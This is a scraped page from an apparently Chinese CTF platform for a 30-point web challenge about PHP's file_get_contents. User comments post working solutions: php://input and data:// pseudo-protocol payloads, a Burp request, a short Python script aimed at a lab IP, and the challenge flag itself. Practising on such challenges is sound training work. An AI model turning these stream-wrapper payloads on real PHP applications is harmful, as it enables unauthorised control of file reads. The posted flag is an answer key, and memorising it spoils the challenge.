file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 3601
提  示:
描  述:
file_get_contents????
评论
liuguowang75 7天前

/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈

回复 0

HK1ng 15天前

file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。

回复 0

goodsnack 15天前

post ac=1&fn=php://input raw里填1,对应ac的值

回复 0

Zhumeng 4月前

看到file_get_getcontents就要想到伪协议

回复 0

Melancholy 4月前

使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1

回复 0

飞天的母猪 5月前

flag{688ebf9ece3756a3a5ac4e16616f1873}

回复 0

xiazhi 6月前

url/?ac=bugku&fn=flag.txt

回复 1

bbggddaa 6月前

https://blog.csdn.net/silence1_/article/details/90241302

回复 0

LLTVLL 7月前

?ac=123&fn=php://input,hackbar中post参数1

回复 0

2324291123 10月前

import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)

回复 0

WriteUp

image
harry

3 金币

评分(5)

解题动态

DoubleUUU 攻破了该题 3小时前
ookjhh 攻破了该题 4小时前
pspp 攻破了该题 5小时前
unigui 攻破了该题 6小时前
ccttffwwyy 攻破了该题 1天前
kaiyafanfan123 攻破了该题 1天前
Bolzman 攻破了该题 1天前
050880 攻破了该题 1天前
daundian 攻破了该题 2天前
Makaba 攻破了该题 2天前
13252036872 攻破了该题 2天前
ptz123 攻破了该题 3天前
ct1640 攻破了该题 4天前
zypts 攻破了该题 4天前
19513396653 攻破了该题 4天前
lindaxu 攻破了该题 4天前
liu216 攻破了该题 4天前
hulihaha 攻破了该题 5天前
tracyfuli 攻破了该题 5天前
13869692992 攻破了该题 5天前
问题反馈